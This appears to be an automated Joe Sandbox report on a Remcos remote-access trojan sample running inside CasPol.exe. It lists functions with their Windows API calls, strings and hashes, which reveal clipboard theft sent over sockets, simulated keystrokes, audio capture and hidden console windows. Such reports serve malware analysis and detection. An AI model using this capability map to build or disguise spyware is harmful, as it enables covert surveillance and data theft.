                                                                                                                                                                                                                                  • Opcode ID: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
                                                                                                                                                                                                                                  • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1bf1e8f9dec5d7cfc4ae1e5b0c5bec2e7773f5590c7fa80be8f87cb2d294935
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                                                                                                                                                  Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: tcp$udp
                                                                                                                                                                                                                                  • API String ID: 0-3725065008
                                                                                                                                                                                                                                  • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                                                                                                                  • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                                                                                                                                  Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                                                                                                                                    • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                                                                                                                    • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                                                                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                                                                                                                    • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                                                                                                                                    • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                                                                                                                    • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                                                                                  • String ID: T=G$p[G$>G$>G
                                                                                                                                                                                                                                  • API String ID: 1596592924-2461731529
                                                                                                                                                                                                                                  • Opcode ID: 41ebb40f2f1bfb1a23cd17121feee99ae440847be78400a274949e541b1a8e90
                                                                                                                                                                                                                                  • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41ebb40f2f1bfb1a23cd17121feee99ae440847be78400a274949e541b1a8e90
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                                                                                                                                                  Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                                                                                                                                    • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                                                                                                                                    • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                                                                                  • String ID: .part
                                                                                                                                                                                                                                  • API String ID: 1303771098-3499674018
                                                                                                                                                                                                                                  • Opcode ID: 05410319be8a459ab309e5df5f3f26762275024d1115655ea8af3afe082379bf
                                                                                                                                                                                                                                  • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05410319be8a459ab309e5df5f3f26762275024d1115655ea8af3afe082379bf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                                                                                                                                  Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                                                                                                                                    • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                                                                                                                                    • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                                                                                                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                                                                                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                                                                                  • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                                                                                  • API String ID: 3286818993-703403762
                                                                                                                                                                                                                                  • Opcode ID: 8a6c4d698cc58011d67a224944d997277571159de44189b964043ef0793dda29
                                                                                                                                                                                                                                  • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a6c4d698cc58011d67a224944d997277571159de44189b964043ef0793dda29
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                                                                                                                                                  Function 0041BEB0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                                                                                                                                                  • GetConsoleWindow.KERNEL32 ref: 0041BEBF
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                                                                                                                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Console$Window$AllocOutputShow
                                                                                                                                                                                                                                  • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                                                                                                                                  • API String ID: 4067487056-2527699604
                                                                                                                                                                                                                                  • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                                                                                                                                                  • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                                                                                                                                                  Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00449B37
                                                                                                                                                                                                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00449B40
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00449B65
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3864826663-0
                                                                                                                                                                                                                                  • Opcode ID: 81d70c20703e66394a8e6e24da3589bfc2c015b76e7b2aedf7d205086cdaf592
                                                                                                                                                                                                                                  • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81d70c20703e66394a8e6e24da3589bfc2c015b76e7b2aedf7d205086cdaf592
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                                                                                                                                                  Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendInput.USER32 ref: 00418B08
                                                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                                                                                                                                                    • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InputSend$Virtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1167301434-0
                                                                                                                                                                                                                                  • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                                                                  • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                                                                                                                                                  Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenClipboard.USER32 ref: 00415A46
                                                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                                                                  • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2172192267-0
                                                                                                                                                                                                                                  • Opcode ID: 2c62b29cbb0c0b726e66b0f18e316f3817271852f488f8e8f00663a8e1569e3c
                                                                                                                                                                                                                                  • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c62b29cbb0c0b726e66b0f18e316f3817271852f488f8e8f00663a8e1569e3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                                                                                                                                                  Function 00447E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00447EBC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00447EE0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00448067
                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00448233
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 314583886-0
                                                                                                                                                                                                                                  • Opcode ID: 04a177aa394c08073a9100b76bd7aa64a881fee61158bcf3f639474d4cceeb7e
                                                                                                                                                                                                                                  • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04a177aa394c08073a9100b76bd7aa64a881fee61158bcf3f639474d4cceeb7e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                                                                                                                                                  Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                                                                                                                                  • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                                                                                                                                                  Function 00443F7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00444086
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044409D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004440BC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004440D7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004440EE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                  • String ID: J7D
                                                                                                                                                                                                                                  • API String ID: 3033488037-1677391033
                                                                                                                                                                                                                                  • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                                                                                                                  • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                                                                                                                                                  Function 04579492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,04579C07,?,00000000,?,00000000,00000000), ref: 045794D4
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0457954F
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0457956A
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 04579590
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,04579C07,00000000,?,?,?,?,?,?,?,?,?,04579C07,?), ref: 045795AF
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,04579C07,00000000,?,?,?,?,?,?,?,?,?,04579C07,?), ref: 045795E8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                  • Opcode ID: 1ceffcebb2d0032ebc0b09f76fa4d4a2cb49254b1a2ace7b77003597ed974efb
                                                                                                                                                                                                                                  • Instruction ID: 47b34f935cd1366e87abc73ec386aa235571791ed665f214f79ee088f949c65f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ceffcebb2d0032ebc0b09f76fa4d4a2cb49254b1a2ace7b77003597ed974efb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F651E9B1D002059FDB10CFA8F895AEEBBF9FF08310F14452AE951E7281E770A945DB60
                                                                                                                                                                                                                                  Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0044A180
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0044A19B
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
